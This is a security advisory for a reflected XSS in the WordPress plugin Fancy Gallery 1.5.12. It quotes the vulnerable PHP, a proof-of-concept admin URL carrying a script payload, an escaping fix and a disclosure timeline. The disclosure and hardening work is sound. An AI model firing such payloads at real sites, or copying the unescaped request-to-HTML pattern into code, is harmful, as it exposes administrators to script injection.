20-11-2014 / Vulnerabilities

Fancy Gallery 1.5.12 Reflected XSS

The value of $_GET['delete'] is concatenated into the error message passed to WP_Die() without being escaped, so it is rendered as HTML in the response.

File: fancy-gallery\class.options.php

public function Load_Options_Page(){
	# Check if the user trys to delete a template
	If (IsSet($_GET['delete']) && $this->core->Get_Template_Properties ($_GET['delete'])){ # You can only delete Fancy Gallery Templates!
		Unlink($_GET['delete']);
		WP_Redirect( $this->Get_Options_Page_Url(Array('template_deleted' => 'true')) );
	}
	ElseIf (IsSet($_GET['delete'])){
		WP_Die($this->t('Error while deleting: ' . $_GET['delete']));
	}
}
private function t($text, $context = False){
	return $this->core->t($text, $context);
}

File: fancy-gallery\class.core.php

public function t($text, $content = False){
	return $this->i18n->t($text, $content);
}

File: fancy-gallery\class.i18n.php

public function t ($text, $context = Null){
	# Translates the string $text with context $context
	If (Empty($context))
		return Translate ($text, __CLASS__);
	Else
		return Translate_With_GetText_Context ($text, $context, __CLASS__);
}

Proof of Concept

The injected script executes for an administrator who opens the following URL (the delete parameter is echoed back in the error page):

http://wordpress-url/wp-admin/options-general.php?page=WordPress/Plugin/Fancy_Gallery/Options&delete=<script>alert(String.fromCharCode(88,83,83,50));</script>
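As an added example (not the plugin's code and not the vendor's 1.5.13 patch), the error message built the vulnerable way beside a form that escapes the request value before it reaches the HTML that WP_Die() renders. It assumes WordPress's esc_html() semantics; a stand-in is defined so the script also runs from the command line without WordPress.

```php
<?php
// Added example, not the plugin's own code: build the "Error while deleting"
// message so that the attacker-controlled $_GET['delete'] value is escaped
// before it is placed in HTML. Assumes WordPress's esc_html() semantics
// (a stand-in is defined here so the file runs outside WordPress).

if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Vulnerable pattern from the advisory: the raw request value is
// concatenated into the message and handed to WP_Die(), which renders HTML.
function unsafe_delete_error($requested) {
    return 'Error while deleting: ' . $requested;
}

// Hardened pattern: only the fixed text is the translatable string (what the
// plugin's t() would receive); the user-supplied value is escaped and
// appended afterwards, so the browser displays the tag characters instead of
// executing them.
function safe_delete_error($requested) {
    $fixed = 'Error while deleting: ';
    return $fixed . esc_html($requested);
}

// Constructed input modelled on the proof-of-concept URL above.
$payload = '<script>alert(String.fromCharCode(88,83,83,50));</script>';

echo 'unsafe: ', unsafe_delete_error($payload), PHP_EOL;
echo 'safe:   ', safe_delete_error($payload), PHP_EOL;

// Self-check: the hardened message must not carry a raw <script> tag from
// the input, while the unsafe one does.
if (strpos(safe_delete_error($payload), '<script') !== false
    || strpos(unsafe_delete_error($payload), '<script') === false) {
    fwrite(STDERR, "escaping check failed\n");
    exit(1);
}
```

The same escaping applies to any other place the plugin echoes the delete parameter back; the redirect branch is not affected because the value is never written into the response there.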

Timeline

  • 13-11-2014: Discovered
  • 13-11-2014: Vendor notified
  • 16-11-2014: Version 1.5.13 released, issue resolved